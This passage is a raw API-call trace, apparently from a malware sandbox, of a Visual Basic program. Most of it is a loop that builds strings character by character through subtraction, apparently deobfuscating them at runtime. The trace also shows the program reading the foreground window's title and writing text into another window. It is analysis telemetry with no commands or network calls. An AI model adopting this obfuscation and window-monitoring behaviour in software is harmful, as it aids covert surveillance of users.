[0173.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.985] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.986] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.986] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.986] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.986] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.987] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.988] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.990] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.991] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.991] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.991] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.992] GetForegroundWindow () returned 0x10278 [0173.992] GetLastError () returned 0x0 [0173.992] SysStringLen (param_1=" ") returned 0xff [0173.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0174.056] SysStringLen (param_1=" ") returned 0xff [0174.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0174.056] GetWindowTextA (in: hWnd=0x10278, lpString=0x11644c4, nMaxCount=255 | out: lpString="Goal Join") returned 9 [0174.105] GetLastError () returned 0x0 [0174.106] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0174.106] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Goal Join") returned 256 [0174.106] SysStringLen (param_1="Goa") returned 0x3 [0174.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Goa", cchWideChar=4, lpMultiByteStr=0x116863c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Goa", lpUsedDefaultChar=0x0) returned 4 [0174.107] SetWindowTextA (hWnd=0x103c4, lpString="Goa") returned 1 [0174.107] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0174.107] GetFocus () returned 0x0 [0174.107] lstrlenA (lpString="Goa") returned 3 [0174.107] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0174.107] IsWindow (hWnd=0x103c4) returned 1 [0174.108] IsWindow (hWnd=0x103c4) returned 1 [0174.108] IsWindow (hWnd=0x103c4) returned 1 [0174.108] IsWindow (hWnd=0x103c4) returned 1 [0174.108] GetFocus () returned 0x0 [0174.109] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0174.109] GetFocus () returned 0x0 [0174.109] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0174.109] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0174.109] GetFocus () returned 0x0 [0174.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goa", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0174.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goa", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=4 | out: lpWideCharStr="Goa") returned 4 [0174.109] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.110] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.111] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0174.111] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.112] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0174.112] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.113] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0174.113] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.114] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0174.114] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.115] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0174.115] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.115] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0174.116] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.116] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0174.117] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.118] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.118] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.118] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.119] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.119] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.119] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.120] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.120] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.121] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0174.121] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.122] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.122] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.123] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.123] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.124] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.124] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.124] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.125] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.125] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.126] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.126] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0174.127] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.254] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.254] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.255] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.255] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.256] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0174.256] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.257] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.257] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.258] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.258] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.259] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.259] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.259] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.260] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.260] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.261] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 